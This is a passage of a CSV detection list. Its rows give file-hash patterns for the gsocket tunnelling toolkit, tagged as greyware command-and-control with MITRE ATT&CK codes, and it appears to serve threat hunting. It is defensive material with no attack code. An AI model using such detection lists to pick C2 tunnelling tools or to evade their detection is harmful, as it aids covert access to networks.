TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6*",".{0,1000}22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908*",".{0,1000}22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560*",".{0,1000}25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72*",".{0,1000}269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1*",".{0,1000}2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de*",".{0,1000}2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849*",".{0,1000}2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6*",".{0,1000}30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048*",".{0,1000}37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef*",".{0,1000}3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9*",".{0,1000}3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e*",".{0,1000}3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9*",".{0,1000}4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441*",".{0,1000}41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae*",".{0,1000}44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949*",".{0,1000}453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6*",".{0,1000}48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf*",".{0,1000}4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d*",".{0,1000}4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59*",".{0,1000}4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f*",".{0,1000}4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844*",".{0,1000}4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k=*",".{0,1000}4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k\=.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5*",".{0,1000}4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7*",".{0,1000}512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911*",".{0,1000}5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c*",".{0,1000}5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14*",".{0,1000}5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5*",".{0,1000}5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5*",".{0,1000}5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e*",".{0,1000}628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671*",".{0,1000}64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8*",".{0,1000}64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c*",".{0,1000}668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f*",".{0,1000}67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73*",".{0,1000}6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a*",".{0,1000}6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2*",".{0,1000}70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3*",".{0,1000}70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f*",".{0,1000}74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3*",".{0,1000}750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281*",".{0,1000}75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc*",".{0,1000}75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547*",".{0,1000}78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07*",".{0,1000}7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6*",".{0,1000}78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f*",".{0,1000}7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883*",".{0,1000}7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2*",".{0,1000}813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4*",".{0,1000}840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b*",".{0,1000}850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47*",".{0,1000}88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170*",".{0,1000}8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8*",".{0,1000}89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1*",".{0,1000}8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3*",".{0,1000}8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
